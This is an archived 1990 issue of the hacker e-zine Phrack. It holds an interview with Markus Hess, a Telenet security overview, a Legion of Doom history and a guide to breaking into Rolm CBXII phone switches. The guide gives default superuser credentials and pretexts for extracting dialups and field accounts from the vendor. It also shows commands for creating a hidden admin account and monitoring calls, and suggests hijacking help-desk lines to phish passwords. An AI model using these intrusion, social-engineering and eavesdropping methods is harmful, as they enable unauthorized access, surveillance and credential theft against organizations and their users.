home *** CD-ROM | disk | FTP | other *** search
/ Amiga ISO Collection / AmigaDemoCD2.iso / ASCII / TEXTE / SCENE / HPA / PHREAKING / phrack31.lha / phrack31
Encoding:
Text File  |  1991-07-04  |  162.3 KB  |  3,642 lines

  1.  
  2.  
  3.  
  4.                                ==Phrack Inc.==
  5.                  Volume Three, Issue Thirty-one, Phile #1 of 9
  6.                               Issue XXXI Index
  7.                               ________________
  8.                               P H R A C K   3 1
  9.                                   05/28\90
  10.                               ________________
  11.  
  12.        Welcome to a new begining of Phrack Inc.  Yes, Phrack is not dead.
  13.      On the contrary, Phrack will and can't ever die.  Phrack is more than just
  14. a technical newsletter  that comes out every now and then, it's a symbol of our
  15. hacking history.   Whether,  it's  called Phrack  or some  other  name, it will
  16. always be published for the same reasons:
  17.    1. Inform it's readers of current events and other related items
  18.              of hacker interest.
  19.    2. Educate it's readers on all topics of shared common interests
  20.              that may benefit the hacker at his hobby.
  21.    3. Remain an authority in the hacking world and an observer in the
  22.              ever growing technical community.
  23.    4. Be open to anyone who wishes to submit an article for publication
  24.              that will further the hacker's education.
  25.     Many things have happened since the last publication of Phrack.  We at
  26. Phrack inc. will try to "shed some light" on the matters that have occured. And
  27. as for all these ridiculous rumors that have been spreading, let us speak the
  28. truth and be heard.
  29.     Hah.  No my friends, Phrack is not dead..
  30.     --DH (Editor)
  31.      Note:  If you wish to contact Phrack inc. to submit a file, ask around for
  32. a Phrack inc.  distribution site  --  Then Email "Phrack inc." and be very very
  33. patient.
  34.      Note:  Special thanks to T C, Phz, and others for wide
  35. area distribution.
  36. _______________________________________________________________________________
  37.  
  38. Phrack XXXI Table of Contents
  39. =============================
  40. 31-1. Introduction to Phrack 31 by DH          (2K)
  41. 31-2. Phrack Pro-Phile of Markus Hess by PHz            (6K)
  42. 31-3. Hacking Rolm's CBXII by DH               (15K)
  43. 31-4. TAMS & Telenet Security by Phreak_Accident        (7K)
  44. 31-5. The history of The Legion Of Doom                 (10K)
  45. 31-6. Cosmos Overview by EBA                  (52k)
  46. 31-7. Tymnet Security Memo by Anonymous                 (9K)
  47. 31-8. PWN/Part01 by Phreak_Accident                     (13K)
  48. 31-9. PWN/Part02 by Phreak_Accident                     (17K)
  49. 31-10. PWN/Part03 by Phreak_Accident                    (40K)
  50. _______________________________________________________________________________
  51.  
  52.                                 ==Phrack Inc.==
  53.                 Volume Three, Issue Thirty-one, Phile #2 of 10
  54.                 -*[  P H R A C K  # 3 1   P R O P H I L E  ]*-
  55.                             -*[  June 1, 1990  ]*-
  56.                                -*[Phz]*-
  57. ---[ Markus Hess ]---
  58.    Recently the Phrack editors had the opportunity to talk to Markus Hess in
  59. his tiny Hannover flat.  This special edition of the Phrack Prophile details
  60. our conversation, as well as general background information about the German
  61. Hacker.
  62.    This Phrack Prophile is not in the same format as previous ones because of
  63. the nature of the profile. In the next issue, we will reform back to the
  64. orginal creator's format.
  65.             AGE: 26
  66.          HEIGHT: 5' 10"
  67.      HAIR COLOR: BROWN
  68.            EYES: BROWN
  69.            FROM: Hannover, West Germany
  70. PAST EMPLOYMENT: Software developer in Hannover.
  71.          PEOPLE: Stephen Winero, Walu Holland (Other CCC members)
  72.       STRENGTHS: AT&T Unix, VAX, SunOs and BSD os's
  73.  
  74.    Hess, most well known as the hacker who's exploits are detailed in
  75. Clifford Stoll's _The_Cuckoo's_Egg_, "is as paranoid on the telephone as he
  76. is on the computer."  Although he was very reluctant to talk to us, we did
  77. manage to talk to him about hacking and _The_Cuckoo's_Egg_.
  78. Ringing Hanover..
  79. RING
  80. RING
  81. RING
  82. ANSWERED
  83. HESS: Hallo?
  84. PHRACK: Is this Markus Hess?
  85. HESS: Yes.
  86. PHRACK: Do you smoke Benson & Hedges?
  87.          (At this point we weren't sure it was actually him)
  88. HESS: Yes, who is this?
  89. PHRACK: We are calling from the USA, we want to ask you some questions.
  90.         We talk to hackers in the USA.
  91. HESS: I won't have anything to do with hackers anymore.  I have talked in
  92.       court earlier this year.
  93. PHRACK: Did you know you were in a novel about a hacker in the US?
  94. HESS: Novel? Yes, I know of a novel.
  95. PHRACK: Have you read the book?
  96. HESS: Yes I have read the book.
  97. PHRACK: Is it all true?  Is it all true?  Do you think Cliff lied or tried
  98.         to exaggerate in the book?
  99. HESS: Yes, I think so.
  100. HESS: Yes, He lied.
  101. PHRACK: Have you ever talked to Stoll?
  102. HESS: I have talked to him, but not privately.  I don't want to talk about
  103.       this.
  104. PHRACK: Have you ever seen Cliff Stoll?
  105. HESS: Yes I have seen him.
  106.       (We might think this from the back of the book)
  107. PHRACK: He's goofy looking isn't he?
  108. HESS: goofy? I don't understand.
  109. PHRACK: Anyway, so you think he lied in the book?
  110. HESS: Yes, he lied.
  111. PHRACK: What did he lie about?
  112. HESS: I don't want to talk about this.
  113. PHRACK: Okay, are you in the Chaos Computer Club?
  114. HESS: No, I won't have anything to do with hackers any more.
  115. PHRACK: Were you ever involved with them?
  116. HESS: No.  I was not in it.
  117. PHRACK: Do you know anyone in it [the CCC]?
  118. HESS: Yes.  I really must go now.
  119. PHRACK: Who do you know in it [the CCC]?
  120. HESS: Stephen Winero.
  121. PHRACK: Is that it?
  122. HESS: I know Walu.
  123. PHRACK: Hmm.  Are you being watched?
  124. HESS: I think so.  I can not talk about this.
  125. PHRACK: Were you scared of going to jail?
  126. HESS: jail?
  127. PHRACK: Prison, were you scared of going to prison?
  128. HESS: I don't know.
  129. PHRACK: What happened in your words at court?
  130. HESS: In your words? I don't understand.
  131. PHRACK: What happened in court?
  132. HESS: I don't understand.
  133. PHRACK: Forget it.
  134. PHRACK: Do you still have your computer?
  135. HESS: No. I don't have any computer here.
  136. PHRACK: Did you think they were going to catch you?
  137. HESS: No.  I knew nothing of it.
  138. PHRACK: Has any other hackers tried to contact you in the U.S.?
  139. HESS: No. You are the first to call.
  140. PHRACK: So is it my understanding that Stoll lied in parts of the book?
  141. HESS: Lied?  Yes he lied.
  142. PHRACK: Why do you think he would lie?
  143. HESS: I don't know.
  144. PHRACK: Do you think he made you look destructive?
  145. HESS: Yes.  He made me look mean.
  146. PHRACK: Are you? Mean that is?
  147.         (Chuckle)
  148. HESS: No.  He made me look like I was a criminal.
  149. PHRACK: Why did you do it Markus?
  150. HESS: Do what?
  151. PHRACK: Hack all over the network like that?
  152. HESS: I cannot answer.
  153. PHRACK: Do they call you a liar in court?
  154. HESS: Yes.  They call me a liar.
  155. PHRACK: What are you going to do now?
  156. HESS: I don't understand.
  157. PHRACK: Are you finished with hacking?
  158. HESS: Yes, I have nothing to do with hackers.
  159. PHRACK: Was someone helping you hack?
  160. HESS: I cannot answer.
  161. PHRACK: How come you cannot answer that question?
  162. HESS: I cannot.
  163. PHRACK: Yes, well, Many in the U.S. [hackers] don't like the Novel.
  164. PHRACK: What do you think of it?
  165. HESS: It is not true.
  166. HESS: I don't know.
  167. PHRACK: Who taught you the EMACS hole?
  168. HESS: I cannot say.
  169. PHRACK: Then you must have been working with someone, correct?
  170. HESS: No, I cannot answer.
  171. PHRACK: Is the police comming down on you hard?
  172. HESS: police? I don't und...
  173. PHRACK: Yeah, yeah.  The law? Are they being hard on you.
  174. HESS: Yes.
  175. <SILENCE>
  176. HESS: I must go now.
  177. PHRACK: Can we call you later?
  178. HESS: Umm, I don't know. No.
  179. PHRACK: Why not?
  180. HESS: I cannot answer.
  181. PHRACK: What about in a couple of months?
  182. HESS: Yes, in a couple of months you can call.
  183. PHRACK: Your not moving are you?
  184.         (Knowing that Germans rarely ever move and their phone
  185.          numbers never change this was a silly Q.)
  186. HESS: No. I no move.
  187. PHRACK: Okay, then we'll call you in a couple of months.
  188. HESS: Okay. I must go.
  189. PHRACK: Wait a second.
  190. HESS: Yes?
  191. PHRACK: Do you have anything to say to American Hackers?
  192. HESS: No.
  193. HESS: I have nothing to do with hackers.
  194. PHRACK: Well, good luck.
  195. HESS: Yes, you too.
  196. <CLICK>
  197.  
  198.    Unfortunately, our lack of German and Hess' weak English made
  199. communication difficult.  He is a very paranoid person who was obviously
  200. uncomfortable talking to us.
  201.    Those of you that have read Stoll's book know that Hess was involved
  202. with hacks on American Military Computers, and indirectly involved with
  203. Computer Espionage and the KGB.  Phrack strongly discourages trying to
  204. hack Military computers and particularly takes offense to computer
  205. espionage.
  206.    From the information we have gathered from him and by talking to him,
  207. we feel that Markus Hess wasn't as smart as Clifford Stoll portrayed him to be.
  208. We also feel that Markus was not working alone and that others were involved.
  209. This however we cannot be 100% sure because of our communication faults.
  210.  
  211. _______________________________________________________________________________
  212.  
  213.                              ===Phrack Inc.===
  214.                Volume Three, Issue Thirty-one, Phile #3 of 10
  215.               /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
  216.              / *                                            * \
  217.              \                                                /
  218.              /           Hacking Rolm's CBXII/9000            \
  219.              \                by DH                  /
  220.              /                   05/24/90                     \
  221.              \ *                                            * /
  222.               \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
  223.  
  224. Introduction
  225. ------------
  226.      IBM Rolm's CBXII/9000 is a very powerful machine.  Powerful in the aspect
  227. that one has the switch(s) at his control.  Controling switches means you can
  228. control the entire PBX environment (And it's users).
  229.      This file will not get technical.  Basically, I'm writing this file on
  230. the HOW-TO's of the internal works of CBXII and the basics of obtaining the
  231. dialups and account information need to access the machines.  For further
  232. information on CBX's in general, read Epsilon's Phrack Phile on them, or
  233. consult Evil Jay's phile on OSL's.
  234.  
  235. Obtaining Dialups
  236. --------- -------
  237.       Obtaining dialups unfortunately is the hardest part of hacking CBXII's.
  238. (Yes, even harder than hacking them).  There are several ways to obtain the
  239. dialups.  I would say a good bit of CBX's are at universities and hospitals
  240. where they own their own switches.  Most of the time you can determine if they
  241. have one by calling the Telecommunications Department of the target location.
  242. Or, another way is to check with ROLM.  If you *KNOW* that a target location
  243. has a CBXxx machine, you can call ROLM's 800 wats line and say your with the
  244. Telecommunications Department and your looking for the DIALUP.  Rolm has files
  245. on all their CBXxx's and the Dialups also.  They might ask you for a NODE #
  246. for the dialup, and you should usually respond with what node you want (Since
  247. different nodes handle different areas of the PBX).  Basically, nodes start at
  248. ONE and usually goto THREE or FOUR, depending on the size of the PBX.
  249.        CBXxx's are greatly compatible of IBM Rolm's Phone-Mail system (Which
  250. is a highly used and common voice mail system).  This of course doesn't mean
  251. that every PHM (Phone-Mail) system has a CBXxx attached.  But it is generally
  252. a good start.
  253.        The following is a checklist to determine if the target location could
  254. have a CBXxx for controlling their switch.  By no means however, if your target
  255. location has all of the following it could have a CBXxx.
  256.         1) Does the location handle it's own switch?
  257.             If so, what kind, and who services it.
  258.         2) Does IBM Rolm handle any aspect of their telecommunications
  259.            department?
  260.             If so, this is a possible CBXxx location.
  261.         3) Does the location have Rolm Phone-Mail?
  262.         These three guidelines are not requirements.  I.E. -- The location
  263. could have a non-IBM PBX but still have a CBXxx for handling the switch.
  264. So who knows.. It's up to you and your bullshitting and scans.
  265. Hacking the CBXxx's
  266. ------- --- -------
  267.         Well, once you have obtained the dial-ups, you are almost halfway
  268. there.  Hacking the CBX is the easy part.  1st off, IBM Rolm ships *ALL*
  269. of their machines with a default account (Yes, and they never change it).
  270. When the destination of the CBX recieves the machine, they use the default
  271. to create other accounts for employees, PBX operators, and administration.
  272. Rolm IBM also has a field support account embedded in the machine.  These
  273. are different to each location and correspond to the serial number of the
  274. machine (Rolm's accounts can be obtained from Rolm's 800 technical support
  275. line).  So, now that we know that there is a default account that telecom
  276. department uses to setup the other accounts after they recieve the machine,
  277. tells us that this is a priviledge account.  And it is.
  278.          USERNAME: SU
  279.          PASSWORD: SUPER
  280.         How nice for them to give us such power.  Yes, it's a basic default
  281. with SuperUser priviledge.  If for some reason the account default has been
  282. changed, their are other ways of getting in:
  283.          1) Call Rolm and get the Field account information.
  284.          2) Try first names of Telecom Dept. employees, and PBX Operators.
  285.          3) Use every Hacking skills you have (If any).
  286.         Some older versions of CBX don't even require logging in with an
  287. account.  Those versions are less responsive to the administrators needs,
  288. but can be useful to one also.  Don't be discouraged if the SU password is
  289. changed, just call Rolm and get the field account.
  290.         The following is the matrix before one access the machine. *Note that
  291. it clearly identifies* *Also: Accessible at 300 baud and e,7,1*
  292. CONNECT                                ID banner
  293.                  _Release version #  /
  294.                 /                   /\
  295. Rolm CBXII  RELEASE 9004.0.65 RB74UCLA11956
  296. BIND DATE: 8/SEP/88                 \
  297. YOU HAVE ENTERED NODE 1, CPU 2       \_Name of owner, IE: UCLA
  298. 11:14:30 ON FRIDAY 2/11/1990             (System ID)
  299. USERNAME: xxx
  300. PASSWORD: xxx
  301. INVALID USERNAME-PASSWORD PAIR.
  302.  
  303. Once your in
  304. ---- ---- --
  305.          Once your in, you should have no problems wondering around the
  306. machine and using the utilities in the machine's operating system.  There is
  307. very specific help functions inside the machine that will guide you through
  308. with no problems.  At the CBX prompt:
  309. %. HELP ?
  310. or
  311. %. ?
  312.           Should produce a valid listing of options and sub-functions.  Every
  313. function can be followed with a '?' to give lists of valid sub-functions under
  314. that function or how the syntax of that function should be used.
  315.           The following is a listing of commands for CBXII/9000:
  316. ABORT              ACTIVATE            ATTR                BYE
  317. CANCEL             CARD                CDRSM               CDT
  318. CHANGE             CHG                 CLEAR               CLR
  319. CMPCT              CMSTS               CNCL                CNFG
  320. CONVERT            COPY                CPEG                CTMON
  321. CTRA               CTRTL               CXCLR               COPY
  322. CXCLR              CXCON               CXNET               DACK
  323. DADD               DAEVT               DANS                DBDMP
  324. DCAT               DCF                 DCOM                DDMA
  325. DDQ                DDT                 DE                  DEACTIVATE
  326. DEFINE             DELETE              DEMOUNT             DESUM
  327. DEX                DFACK               DFCOM               DFEAT
  328. DFEVT              DHTQ                DHWS                DIAG
  329. DIQ                DISABLE             DIWQ                DKQ
  330. DML                DMNT                DMS                 DMTST
  331. DOWN               DPATR               DPMR                DPMS
  332. DPPRI              DPTR                DQQ                 DRCT
  333. DREGS              DSBLE               DSQ                 DSST
  334. DSTAK              DTCB                DTDQ                DWQ
  335. DX_TR              ENABLE              ENB                 ENBLE
  336. ETIO               EX                  EXM                 EXN
  337. EXP                EXPAND              FINIT               FORMAT
  338. FREER              FSD                 GTOD                HDBST
  339. HELP               INSTALL             KPFA                LCT
  340. LIST               LOAD                LOGOFF              LOGON
  341. LPEG               LPKT                LSCT                LSL
  342. LST                LTCB                MNT                 MONITOR
  343. MOUNT              MTRACE              NEXT                NSTAT
  344. PAGE               PCNFG               PDIO                PFA
  345. PKTS               PLIST               PLTT                PPFA
  346. PS                 PSH                 QAT                 QITM
  347. QTEST              RCT                 RECEIVE             RENAME
  348. REPLY              RESTART             RESTORE             REVERSE
  349. RM                 RMOFF               RPFA                RSC
  350. RSCLK              RSTOR               RSTRT               SAT
  351. SCAN               SEND                SET                 SHOW
  352. SITM               SOCON               SOUNC               SSAT
  353. START              STATE               STATUS              STEST
  354. STOD               STOP                STRT                STS
  355. TDCD               TEST                TKSTS               TRTL
  356. TST                TX                  UNLK                UNLOCK
  357. UP                 VERIFY              XDEF                XMIT
  358. XPND
  359.      These commands can be executed from and '% ' prompt.  If the command is
  360. followed by a '?', more information will be supplied about the command.
  361. Using the ICI
  362. ----- --- ---
  363.      The Interactive Configuration Interface controls immediate changes in
  364. the switch and PBX environment.  The Utility is explained in great detail
  365. through the actual running of it.  You can access the ICI by typing:
  366. % CNFG
  367.                        CBXII/9000
  368.         INTERACTIVE  CONFIGURATION INTERFACE
  369.                          CPU 2
  370. 15:14:32 ON FRIDAY 5/02/1990
  371. COMMAND:
  372.       This is the main command prompt.  From here you can exercise the '?'
  373. help list to get valid commands.  There are four phases of the ICI utility:
  374. Modify, Create, List, and Delete.  These can be used on Extentions, Trunks,
  375. Logon accounts, Feature Group sequences, Data_line access, Trunk Groups, ect.
  376. The following is a sample of using 'list' to list a current extention in the
  377. PBX:
  378.                                _Forward to EXTN 2000
  379. COMMAND: LIST EXT 4038        /                            _Outside number
  380.                              /             FORWARD ON     /  to forward to
  381.                            FORWARDING     BSY RNA DND    /
  382.    EXTN     TYPE   COS   TARGET1 TARGET2  I E I E I E RINGDOWN  NAME
  383.    ----     ----   ---   ------- -------  - - - - - - --------  ----------
  384. DS 4038     EXTN   56    2000             1 1 1 1 1 1 95551212  R.STABELL
  385.     \          \    \                     /   /    \               \
  386.     Extention  /     -Class of service   if  R    Auto. Forward   Owner of
  387.               --Type of line            BUSY  I   No Matter What   EXTN.
  388.                 (Reg. Extention)               N
  389.                                                 G
  390. Note: The 1's specifies to forward to target#1    & NO ANSWER
  391.       (As 2's would mean forward to #2 target)
  392.      This should detail how to modify a listing like above using the 'MODIFY'
  393. command in the ICI.  Once modified, all transactions are processed immediately.
  394. Using the 'Delete' command one can delete extentions, trunks, ect.
  395.      So now we have the following commands in ICI: MODIFY, DELETE, LIST, CREATE.
  396. Each can be used with the following "Nouns" to modify that "Noun":
  397. BUTTON_120         BUTTON_240          CDR_EXCLUDE         CNFG_ERRORS
  398. CNFG_QUEUE         CNFG_STATUS         CNFG_USERS          COM_GROUP
  399. COS_FEAT           DATA_ACCESS         DATA_DEVICE         DATA_GROUP
  400. DATA_LINE          DATA_SUBMUX         DLI                 ETS
  401. EXTEN              FAC                 FAC_TYPE            FAMILY
  402. FEAT_CODE          FIRST_DIGIT         HD_GROUP            LEX
  403. LOGON_PROFILE      MAP                 MEM_PARTS           PARAM
  404. PICK               POWER               Q_TYPE              ROUTE_LIST
  405. RP                 RPD                 RPI                 RPS_120S_ON
  406. RPS_240S_ON        SAT_NAME            SEARCH_SEQ          SECTION
  407. SECURITY_GROUP     SERVICE_LIST        SIO_PARTS           SLI
  408. SPEED              T1D3                T1D3_GRP            TRUNK
  409. TRUNK_GROUP        VPC
  410.       The FAMILY, LOGON_PROFILE, and CNFG_USER all deal with the accounts on
  411. the system.  One can use MODFIY or CREATE to set them up an account with SU
  412. access.  The FAMILY noun is the listing of the groups with different access,
  413. to different "nouns" available. I.E.: Not everyone can access the CHANGE
  414. LOGON_PROFILE to create an account.
  415.       To create an account with SU access, type (while in ICI):
  416. % CREATE LOGON_PROFILE
  417. ENTER NAME (1-12 CHAR): TEST
  418. ENTER PASSWORD: TEST
  419. RETYPE: TEST
  420.       Next it will ask you for a family.  For SU access, type "SYSTEM_ADMIN".
  421. After family, the machine should prompt you for a "verb". Verbs are the actual
  422. functions or commands, so in this environment you can set the commands a user
  423. can access.  So, for SU, enter "ALL" for every command access.
  424.       To get a valid listing of users online, try this:
  425. % LIST CNFG_USERS
  426. NUMBER OF USERS    MAX NUMBER OF USERS
  427.      3                  5
  428. PORT    USER_NAME    START_TIME  HOW_LONG
  429. 17      SU           17:47:57    0:28:34
  430. 2       FIELD        18:16:03    0:0:28
  431. 3       MARYB        18:16:03    0:10:03
  432.  
  433. Using the Monitoring Utility
  434. ----- --- ---------- -------
  435.       This command is one of the more powerful commands in the CBXxx system.
  436. The monitor command should be invoked from within the main function command
  437. level and not in the ICI level.  The monitoring command allows you to actually
  438. watch or monitor TRUNKS and EXTENTIONS.  So, if I were to type:
  439. % MONITOR EXT 4038
  440. 10:02:43 ON FRIDAY MAY/02/1990
  441. EXT#   STATE            DI  CODE  DIGITS         PROCESS      STATUS
  442. ----   ---------------  --  ----  -------------  ------------ ------
  443. 4038   IDLE                                      STN FWD NUM   FWD
  444.  \         \                                     /    /    /    \
  445. Extention   Not in use                   Standard     \   /        Forwarded
  446.                                          Extention     \ /
  447.                                                     Forwarded to
  448.                                                      a number
  449.       This shows the extention to be IDLE and not in use.  But, with forwarded
  450. call processes to a standard number.  You would have to use ICI to look up the
  451. number it's forwarded to if you wanted.
  452. % MONITOR EXT 4038
  453. 10:03:44 ON FRIDAY MAY/11/1990
  454. EXT#    STATE           DI  CODE  DIGITS         PROCESS     STATUS
  455. ----    --------------  --  ----  -------------  ----------- ------
  456. 4038    DIAL TONE                                STN FWD NUM  FWD
  457. 4038    DIALING         Y         9             /    \   \     \
  458. 4038    DIALING         Y         92           S     F    N     \Extention
  459. 4038    DIALING         Y         923           t     o    u       Forwarded
  460. 4038    DIALING         Y         9233           a N   r    m
  461. 4038    DIALING         Y         92334           n u   w    b
  462. 4038    DIALING         Y         923345           d m   a    e
  463. 4038    DIALING         Y         9233456           a b   r    r
  464. 4038    DIALING         Y         92334564           r e   d
  465. 4038    CONN T025N      N              \              d r   e
  466.  /             \        /               \                    d
  467.  \              \       \_Dialing NO     \_Number dialed
  468.   \_Extention    \
  469.                Connected to
  470.               Outside trunk T025N
  471.      This monitoring shows the extention actually dialing the number, and then
  472. connecting to an outside truck.  Unfortunatley, one we cannot monitor without
  473. access to a bell switch.
  474.      Monitoring can also be done with trunks.  I will not display any trunk
  475. monitoring since it is quite simple to decypher.
  476. Manipulating the switch
  477. ------------ --- ------
  478.      There are many ways you can manipulate the CBX's to gain accounting
  479. information on data lines within the PBX environment.  One sure-fire method
  480. would be to forward an actual data dial-up extention to a bridge or loop and
  481. then write an emulation to intercept the user's account information real-time
  482. as they connect to your fake dial-up.
  483.      Or perhaps if an university uses the CBX, one could maybe forward the
  484. computer help desk extention to a bridge or loop and as an unsuspecting user
  485. calls up, ask him what machine and account info he has access to for a help
  486. log sheet you are taking.
  487.     Who cares. Who knows.  There are thousands of things you can do to use
  488. the CBX to your advantage.  Hell, you have the whole switch at your command.
  489. DH -  05/11/90
  490.  
  491. _______________________________________________________________________________
  492.  
  493.                              ==Phrack Inc.==
  494.              Volume Three, Issue Thirty-one, Phile #4 of 10
  495.               /  Everything you always wanted to know..  \
  496.       /  about Telenet Security, But were to stupid to find out. \
  497.                             By Phreak_Accident
  498.      Ever since the early 80's GTE Telenet has been expanding their public
  499. packet switching system to hold enormous amounts of users.  Currently GTE
  500. SprintNet (Yes, Telenet is out, SprintNet is in.) has over 300 nodes in the
  501. United States and over 70 other nodes abroad.  SprintNet provides private
  502. X.25 networks for larger companies that may have the need.  These private
  503. networks are all based on SprintNet's 3270 Dedicated Access Facility which
  504. is currently operating for public use, Hence for the major security Sprint-
  505. Net has aquired.
  506.       SprintNet's security department is a common idea of what any large
  507. public packet network should be.  With their home office located in Virgina
  508. (703), most Hacker's who run into trouble with them would wind up talking
  509. to Steve Mathews (Not the head of security but a prime force against the
  510. major attacks Sprintnet recieves from Hackers anually.), who is a very
  511. intelligable security analysist that deals with this type of problem daily.
  512.       Because of Steve's awarness on Hackers invading "His" system (As most
  513. security personnel refer to the system's they work for as their own.), He
  514. often does log into Bulletin Boards accross the country looking for Sprint-
  515. Net related contraband.  At the time of this article, Steve is running an
  516. investigation on "Dr. Dissector's" NUAA program. (NUA attacker is a Sprint-
  517. Net NUA scanner.)  Besides this investigation, he currently stays in contact
  518. with many Hackers in the United States and Abroad.  It seems Steve recieves
  519. many calls a month from selected Hackers that have interests in the Security
  520. of SprintNet.  Wow.  Who the Hell would want to call this guy.  From many
  521. observations of Steve Mathews, I find him to in deed be the type to feel a
  522. bit scared of Hackers.  Of course, his fright is really quite common amoung
  523. security personnel since most fear for their systems as well as themselves.
  524. (Past experiences have showed them not to take Hackers lightly, Hence they
  525. have more contacts then 60 rolodex's put together.)
  526.        For now, let's forget Steve Mathews.  He's not important an important
  527. influence in this article.  Trying to pin a one-person in a security depart-
  528. ment that handles security is like finding a someone on a pirate board that
  529. doesn't use the word "C0DE" in their daily vocabulary.
  530.        Telenet's main form of security lies in their security software called
  531. TAMS (Telenet Access Manager System).  The TAMS computers are located in Res-
  532. tin, Virginia but are accessable throughout the network.  Mostly, the main
  533. functions of TAMS are to:
  534.        * Check to see if the NUI/Password entered is a valid one.
  535.        * Check to see if the Host has list of NUI's that can access
  536.             that host.  If another NUI is used, a Rejection occurs.
  537.        * Processes SprintNet's CDR (Call Detail Recording), which
  538.             includes Source and Destination, Time of call, Volumes
  539.             of data recieved, and the Total time of the call.
  540.        * Can be used by host to add an optional "ALPHA" NUA for "easy"
  541.             access.
  542.        * Can secure Hosts further by adding an NUA security password.
  543.        * Restricts calls without an NUI for billing (I.E. No collect
  544.          calls to be processed).
  545.        * Accepts all calls to host as a prepaid call (I.E. Accepts all
  546.          calls).
  547.      TAMS is really for the handling of NUI and corresponding NUA's, therefore
  548. being a security concept.  TAMS holds all the data of NUI's and restricting NUAS
  549. for the ENTIRE network.  If one could gain the access to TAMS, one could have
  550. the entire network at his/her disposal.  This of course if highly impossible
  551. to SprintNet's security department, but not for a couple of hackers I have ran
  552. into.  Yes, TAMS is quite interesting.
  553.       In other aspects of SprintNet security, lets focus on the actual X.25
  554. software that they use.  Anybody who tells you that Telenet can monitor the
  555. sessions currently taking place on THEIR network is WRONG (And probably very
  556. stupid as well).  Monitoring is a basic feature of all X.25 networks, whether
  557. it's a little PeeShooter network or not, they can and do monitor sessions.
  558.        Of course their are far to many calls being placed on SprintNet to be
  559. monitored, but a scared host can always request a full CDR to be put on their
  560. address to record all sessions comming in on that NUA.  Such as the many re-
  561. corded sessions of the ALTOS chat(s) in Germany that was a hot-spot for many
  562. Hackers across the United States and Abroad.  After the detection of ALTOS,
  563. through the hundereds of illegally used NUIs, CDR's and direct host monitoring
  564. were used on the ALTOS hosts.  As far as prosecutions concern, I doubt their
  565. were any.
  566.         Now, as far as other security software on SprintNet, they have a call
  567. tracking service that is called AUTOTRAIL.  Basically, AUTOTRAIL traces the
  568. connections through the DNIC's and back to the orginating NUI and/or NODE loca-
  569. tion that placed the call.
  570.         AUTOTRAIL has nothing to do with ANI.  Not at all.  In fact, the many
  571. dialups that lead into SprintNet's PDM gateway do NOT have any type of ANI.
  572. That is basically a telephony problem.  ALthough I would think twice about
  573. messing with a dialup that is run on a GTE carrier.  That's up to you though.
  574.         Another aspect of security in which Telenet offers is an ASCII tape
  575. that can be obtained by a host customer, which contains all CDR information of
  576. any connection to that host for the last week/month/year.  So, it is obvious
  577. to say that SprintNet does have a hudge database of all CDRs.  Yes, another
  578. point:  This database is located in the TAMS computer.  Hmm, ahh.. Wouldn't
  579. that be neat.
  580. :PA
  581.  
  582. _______________________________________________________________________________
  583.                                ==Phrack Inc.==
  584.                 Volume Three, Issue Thirty-one, Phile #5 of 10
  585.  
  586. The History of The Legion Of Doom
  587. --- ------- -- --- ------ -- ----
  588. During the summer of 1984 an idea was formulated that would ultimately
  589. change the face of the computer underground forever.  This particular
  590. summer, a huge surge of interest in computer telecommunications placed
  591. an incredibly large number of new enthusiasts on the national computer scene.
  592. This crowd of people all seeking to learn as much as possible
  593. began to put a strain on the nation's bulletin board scene, as the novices
  594. stormed the phonelines in search of knowledge.  From out of this chaos
  595. came a need for learned instructors to help pass on their store of
  596. information to the new throngs.
  597. One of the most popular bulletin boards of the day was a system in New York
  598. state called Plovernet, which was run by a person who called himself
  599. Quasi-Moto.  This BBS was so heavily trafficked, that a major long
  600. distance company began blocking all calls to its number (516-935-2481).
  601. The co-sysop of Plovernet was a person known as Lex Luthor.  At the time
  602. there were a few hacking groups in existence, such as Fargo-4A and Knights of
  603. Shadow.  Lex was admitted into KOS in early 1984, but after making a few
  604. suggestions about new members, and having them rejected, Lex decided to
  605. put up an invitation only BBS and to start forming a new group.
  606. Starting around May of 1984, Lex began to contact those people who he had
  607. seen on BBSes such as Plovernet and the people that he knew personally
  608. who possessed the kind of superior knowledge that the group he envisioned
  609. should have.  Many phone calls and Alliance Teleconferences later, the
  610. group of individuals who made up the original Legion of Doom were compiled.
  611. They were:
  612.                Lex Luthor
  613.                Karl Marx
  614.                Mark Tabas
  615.                Agrajag the Prolonged
  616.                King Blotto
  617.                Blue Archer
  618.                EBA
  619.                The Dragyn
  620.                Unknown Soldier
  621. The group originally consisted of two parts:  Legion of Doom, and Legion
  622. of Hackers.  The latter was a sub-group of the first, comprised
  623. of people who were more advanced in computer related subjects.  Later on,
  624. as members began to all become more computer-based, the Legion of Hackers
  625. was absolved.  (The name "Legion of Doom" came from the cartoon series
  626. "Superfriends," in which Lex Luthor, Superman's arch rival, led a group
  627. by the same name)
  628. The actual Legion of Doom bulletin board was quite ahead of its time.
  629. It was one of the first "Invitation-only" hacking based BBSes; it was the
  630. first BBS with security that caused the system to remain idle until
  631. a primary password was entered; and it was the first hacking BBS to deal
  632. with many subjects in close detail, such as trashing and social
  633. engineering.  The BBS underwent three number changes and three different
  634. login procedures during its life.  At its height, the BBS had over
  635. 150 users and averaged about 15 posts per day.  This may seem
  636. high when compared to contemporary BBSes, but this was a private system,
  637. with only very-competent users, so the quality of messages content was always
  638. high.
  639. There was always some confusion that falsely assumed since someone
  640. was on the LOD BBS, that they were a member of the group.  In fact,
  641. only a handful of the total LOD membership were ever on the actual
  642. LOD BBS.
  643. The Legion of Doom also had special subboards created for its members on
  644. other BBSes after the home base BBS went offline.  The first was on
  645. Blottoland, the next on Catch-22, followed by one on the Phoenix Project,
  646. and the last on Black Ice Private.  The group's members have usually tried to
  647. keep a low profile publicly, and usually limited their trade of information
  648. to select private BBSes and personal telephone conversations.  This adherence
  649. to privacy has always added to the LOD mistique.  Since most people didn't
  650. know exactly what the group was involved in, or experimenting with, people
  651. always assumed that it was something far too detailed or sensitive to be
  652. discussed.  For the most part, this was not true, but it did not help to
  653. diminish the paranoia of security personnel that LOD was after their
  654. company's systems.
  655. The group has undergone three distinct phases, each a result of membership
  656. changes.  The first phase ended with the busts of Marx, Tabas, Steve Dahl,
  657. Randy Smith, X-man, and the abandonment by Agrajag and King Blotto.
  658. The group lay semi-dormant for several months, until a resurgence
  659. in the summer of 1986, in which several new members were admitted, and a new
  660. surge of would-be hackers appeared, ready to be tutored.  This phase again
  661. ended in a series of busts and paranoia.  The third phase basically revolved
  662. around Summercon of 1988, where several new members were admitted by those
  663. LOD members attending the festivites.  The third phase is now at an end
  664. brought on by busts and related paranoia, again, two years after its onset.
